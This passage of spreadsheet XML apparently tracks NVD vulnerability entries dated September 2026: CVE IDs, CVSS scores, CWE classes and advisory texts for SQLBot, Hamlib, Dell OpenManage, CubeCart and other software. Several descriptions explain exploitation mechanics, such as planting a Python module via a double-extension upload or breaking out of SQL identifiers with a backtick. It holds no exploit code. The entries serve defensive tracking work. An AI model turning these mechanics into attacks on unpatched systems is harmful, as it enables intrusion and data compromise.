      <c r="D209" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>SQLBot is an intelligent Text-to-SQL system based on large language models and RAG. Prior to 1.9.0, the POST /api/v1/datasource/parseExcel endpoint in backend/apps/datasource/api/datasource.py uses attacker-controlled multipart filename data when selecting where uploaded content is stored, writes the content before spreadsheet parsing and validation finish, and can transform a double-extension filename into a Python source file. An attacker able to submit a crafted multipart upload can use these behaviors to place attacker-controlled content in /opt/sqlbot/app/alembic/versions/ even when a spreadsheet parsing failure after the file write causes the endpoint to return an error. The planted file remains on disk, and subsequent SQLBot startup or migration processing causes Alembic to import the module and execute its module-level statements in the SQLBot application runtime. This issue is fixed in version 1.9.0.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53554</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54634</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-787, CWE-908</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Hamlib is a ham radio control library for radios, rotators, and amplifiers. Prior to 4.7.2, the unauthenticated rigctld send_raw command on TCP port 4532 reaches rigctl_send_raw() in tests/rigctl_parse.c, which writes a NUL byte at buf[buf_len + 1] outside its 200-byte stack buffer, and rig_send_raw() in src/rig.c, which copies reply_len - 1 bytes instead of the actual nbytes received. A remote client can send the CR terminator with a short payload to trigger both flaws in one command under the default no-password configuration. The out-of-bounds write can crash the daemon or corrupt adjacent stack memory, while the oversized copy can return up to 198 bytes of uninitialized stack data to the client. This issue is fixed in version 4.7.2.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54634</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66269</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Protection mechanism bypass.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66269</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76154</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>security@grafana.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>A stored cross-site scripting vulnerability in the Geomap panel's MapLibre base layer allows a user with the Editor role to execute arbitrary JavaScript in another user's session by hosting a malicious style configuration, enabling escalation to Org Admin.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76154</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80356</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Exposure of Sensitive Information to an Unauthorized Actor vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80356</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81440</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7.3</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Use of Hard-coded Credentials vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81440</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52727</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>lxc-ci contains continuous integration and image-build scripts for LXC. Prior to the 2026-05-28 Arch Linux image publication, images built from images/archlinux.yaml retain the same pacman local-signing private key in /etc/pacman.d/gnupg and redistribute it to every container or virtual machine created from that image. An attacker who controls an HTTP package mirror or can intercept mirror traffic can use the shared pacman signing private key to sign modified packages that affected clients accept as trusted. Installing those packages permits arbitrary code execution as root on the client system. This issue is fixed in Arch Linux images published on or after 2026-05-28.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52727</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54646</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, admin/sources/maintenance.index.inc.php places administrator-controlled tablename values into ALTER TABLE, CHECK TABLE, and ANALYZE TABLE statements without validating the identifiers or escaping embedded backticks. An authenticated administrator can terminate the quoted identifier with a closing backtick and introduce attacker-controlled structural SQL, potentially compromising database confidentiality, integrity, and availability within the application's database privileges. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54646</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54647</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>CubeCart is an ecommerce software solution. Prior to 6.7.5, admin/sources/settings.index.inc.php directly concatenates the administrator-controlled download_expire POST parameter into a raw UPDATE statement for CubeCart_downloads without numeric validation. An authenticated administrator can supply a comma-delimited value that changes the SET clause because HTML sanitization does not neutralize SQL syntax, allowing manipulation of database columns and potentially other data within the application's database privileges. This issue is fixed in version 6.7.5.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54647</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81445</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains an Improper Privilege Management vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Elevation of privileges.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81445</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81477</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Heap-based Buffer Overflow vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81477</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81480</t>
        </is>
      </c>
      <c r="D220" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F220" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr"/>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-09-18</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Stack-based Buffer Overflow vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Code execution.</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81480</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81632</t>
        </is>
      </c>
      <c r="D221" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E221" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F221" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr"/>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t>Use of HTTP Request With Sensitive Query String vulnerability in team-alembic AshAuthenticationPhoenix allows someone able to read access logs, proxy logs or browser history to recover a single-use sign-in token and authenticate as its owner.
After a successful password sign-in, AshAuthentication.Phoenix.Components.Password.SignInForm builds the sign_in_with_token path with the freshly issued user.__metadata__.token as a query parameter and redirects the browser to it with a GET. The token therefore travels in the request line, where web servers, reverse proxies, request telemetry and the browser's own history record it, all of which outlive the request and are ordinarily less protected than session storage. The redirect destination is restricted to a local path, so this is not an open redirect; the exposure is the retention of a live credential.
This issue affects ash_authentication_phoenix: from 1.7.0 before 2.17.4 and from 3.0.0-rc.0 before 3.0.0-rc.11; ash_authentication: from 3.10.5 before 4.15.0 and from 5.0.0-rc.0 before 5.0.0-rc.14.</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81632</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92919</t>
        </is>
      </c>
      <c r="D222" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E222" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F222" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr"/>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t>admin3 through 3.0.0 fails to sanitize client-supplied filenames in the upload handler, allowing authenticated users to write files outside the storage root on Windows deployments. Attackers can use dot-dot path segments in filenames to escape the configured storage directory and overwrite arbitrary files accessible to the server process.</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92919</t>
        </is>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B223" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C223" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92980</t>
        </is>
      </c>
      <c r="D223" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E223" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G223" s="5" t="inlineStr"/>
      <c r="H223" s="5" t="inlineStr"/>
      <c r="I223" s="5" t="inlineStr"/>
      <c r="J223" s="5" t="inlineStr"/>
      <c r="K223" s="5" t="inlineStr"/>
      <c r="L223" s="5" t="inlineStr"/>
      <c r="M223" s="5" t="inlineStr"/>
      <c r="N223" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O223" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P223" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q223" s="5" t="inlineStr"/>
      <c r="R223" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S223" s="5" t="inlineStr">
        <is>
          <t>HortusFox-Web prior to version 6.1 contains a remote code execution vulnerability that allows authenticated administrators to execute arbitrary OS commands as the web server user by abusing the Import/Export functionality. Attackers can leverage the Import/Export feature, which is intended solely for data portability, to deploy and execute malicious code on the underlying application server host.</t>
        </is>
      </c>
      <c r="T223" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92980</t>
        </is>
      </c>
    </row>
    <row r="224">
      <c r="A224" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B224" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C224" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15697</t>
        </is>
      </c>
      <c r="D224" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E224" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F224" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G224" s="5" t="inlineStr"/>
      <c r="H224" s="5" t="inlineStr"/>
      <c r="I224" s="5" t="inlineStr"/>
      <c r="J224" s="5" t="inlineStr"/>
      <c r="K224" s="5" t="inlineStr"/>
      <c r="L224" s="5" t="inlineStr"/>
      <c r="M224" s="5" t="inlineStr"/>
      <c r="N224" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O224" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P224" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q224" s="5" t="inlineStr"/>
      <c r="R224" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S224" s="5" t="inlineStr">
        <is>
